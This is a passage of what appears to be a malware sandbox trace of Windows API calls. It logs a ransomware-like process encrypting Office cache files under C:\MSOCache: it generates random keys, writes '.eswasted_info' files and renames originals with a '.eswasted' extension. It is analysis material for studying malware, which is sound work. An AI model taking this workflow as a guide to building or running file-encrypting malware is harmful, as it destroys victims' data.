Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.885] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0071.885] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x138 [0071.888] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.889] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.889] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.889] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.890] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.890] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.898] SetEndOfFile (hFile=0x130) returned 1 [0071.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.900] CloseHandle (hObject=0x130) returned 1 [0071.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.901] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.902] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.902] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.902] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0071.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x70b3c8 [0071.902] lstrcpyW (in: lpString1=0x70b464, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71b640 [0071.902] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.903] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71b640 | out: pbBuffer=0x71b640) returned 1 [0071.903] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.903] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.904] WriteFile (in: hFile=0x130, lpBuffer=0x71b640*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71b640*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.905] SetEndOfFile (hFile=0x130) returned 1 [0071.905] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b640 | out: hHeap=0x6d0000) returned 1 [0071.905] lstrcpyW (in: lpString1=0x70b464, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.eswasted")) returned 1 [0071.909] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0071.909] CreateFileMappingW (hFile=0x138, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0071.913] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.914] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.914] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.914] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.915] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.915] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.946] SetEndOfFile (hFile=0x130) returned 1 [0071.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x736c48 | out: hHeap=0x6d0000) returned 1 [0071.949] CloseHandle (hObject=0x130) returned 1 [0071.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.950] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.951] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.951] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.951] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0071.951] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c4) returned 0x717b00 [0071.951] lstrcpyW (in: lpString1=0x717bba, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.951] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x736c48 [0071.951] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.952] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x736c48 | out: pbBuffer=0x736c48) returned 1 [0071.952] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.952] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.953] WriteFile (in: hFile=0x130, lpBuffer=0x736c48*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x736c48*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.954] SetEndOfFile (hFile=0x130) returned 1 [0071.954] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x736c48 | out: hHeap=0x6d0000) returned 1 [0071.954] lstrcpyW (in: lpString1=0x717bba, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.eswasted")) returned 1 [0071.957] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.957] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0071.960] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.960] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.960] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.960] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.961] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.961] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.969] SetEndOfFile (hFile=0x130) returned 1 [0071.972] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x737b58 | out: hHeap=0x6d0000) returned 1 [0071.972] CloseHandle (hObject=0x130) returned 1 [0071.974] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0071.974] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.975] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.975] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.975] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0071.975] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c2) returned 0x717b00 [0071.975] lstrcpyW (in: lpString1=0x717bb8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.975] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x736c48 [0071.975] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.976] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x736c48 | out: pbBuffer=0x736c48) returned 1 [0071.976] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.976] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.976] WriteFile (in: hFile=0x130, lpBuffer=0x736c48*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x736c48*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.978] SetEndOfFile (hFile=0x130) returned 1 [0071.978] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.978] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x736c48 | out: hHeap=0x6d0000) returned 1 [0071.978] lstrcpyW (in: lpString1=0x717bb8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.eswasted")) returned 1 [0071.979] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0071.979] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.320] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.321] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.321] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.321] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.322] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.322] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.333] SetEndOfFile (hFile=0x130) returned 1 [0072.336] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.336] CloseHandle (hObject=0x130) returned 1 [0072.338] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.338] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.339] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.339] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.340] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0072.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x6f5cc0 [0072.340] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.340] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.341] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.341] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.341] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.364] WriteFile (in: hFile=0x11c, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.365] SetEndOfFile (hFile=0x11c) returned 1 [0072.365] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.365] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.365] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0072.366] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.367] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0072.369] CryptAcquireContextW (phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040) [0072.369] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.370] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.370] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.370] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.371] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.371] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.382] SetEndOfFile (hFile=0x11c) returned 1 [0072.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.385] CloseHandle (hObject=0x11c) returned 1 [0072.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0072.387] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.388] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.388] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.388] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0072.388] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ac) returned 0x6f6880 [0072.389] lstrcpyW (in: lpString1=0x6f6922, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.389] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.389] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.390] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.390] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.390] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.391] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.392] SetEndOfFile (hFile=0x11c) returned 1 [0072.392] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.392] lstrcpyW (in: lpString1=0x6f6922, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.393] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted")) returned 1 [0072.394] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.394] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0072.395] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.396] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.396] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.397] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.398] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.398] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.418] SetEndOfFile (hFile=0x11c) returned 1 [0072.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.421] CloseHandle (hObject=0x11c) returned 1 [0072.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6880 | out: hHeap=0x6d0000) returned 1 [0072.423] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.424] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.424] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.424] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0072.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x717b00 [0072.424] lstrcpyW (in: lpString1=0x717b98, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.424] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.425] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.425] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.425] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.426] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.427] SetEndOfFile (hFile=0x11c) returned 1 